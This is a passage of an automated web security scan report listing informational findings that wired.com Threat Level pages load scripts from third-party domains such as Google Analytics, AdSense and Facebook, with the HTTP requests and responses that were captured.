Path:	/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:29 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=386
Expires: Wed, 12 Jan 2011 15:33:29 GMT
Date: Wed, 12 Jan 2011 15:27:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.83. http://www.wired.com/threatlevel/author/kimzetter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/author/kimzetter/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/author/kimzetter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:25:48 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=331
Expires: Wed, 12 Jan 2011 15:33:34 GMT
Date: Wed, 12 Jan 2011 15:28:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.84. http://www.wired.com/threatlevel/category/announcements/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/announcements/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/announcements/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:11 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=313
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.85. http://www.wired.com/threatlevel/category/atm-hacking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/atm-hacking/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/atm-hacking/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:09:34 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=310
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.86. http://www.wired.com/threatlevel/category/bittorrent/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/bittorrent/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/bittorrent/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=308
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.87. http://www.wired.com/threatlevel/category/black-hat-conference/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/black-hat-conference/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/black-hat-conference/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=302
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.88. http://www.wired.com/threatlevel/category/bradley-manning/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/bradley-manning/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/bradley-manning/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=257
Expires: Wed, 12 Jan 2011 15:32:53 GMT
Date: Wed, 12 Jan 2011 15:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.89. http://www.wired.com/threatlevel/category/breaches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/breaches/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/breaches/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.90. http://www.wired.com/threatlevel/category/censorship/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/censorship/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/censorship/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:10:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=298
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.91. http://www.wired.com/threatlevel/category/chaos-computer-club/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/chaos-computer-club/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/chaos-computer-club/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:07:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=246
Expires: Wed, 12 Jan 2011 15:32:53 GMT
Date: Wed, 12 Jan 2011 15:28:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.92. http://www.wired.com/threatlevel/category/conferences/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/conferences/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/conferences/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=272
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:28:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.93. http://www.wired.com/threatlevel/category/copyrights-and-patents/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/copyrights-and-patents/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/copyrights-and-patents/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=278
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.94. http://www.wired.com/threatlevel/category/coverups/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/coverups/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/coverups/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=246
Expires: Wed, 12 Jan 2011 15:33:07 GMT
Date: Wed, 12 Jan 2011 15:29:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

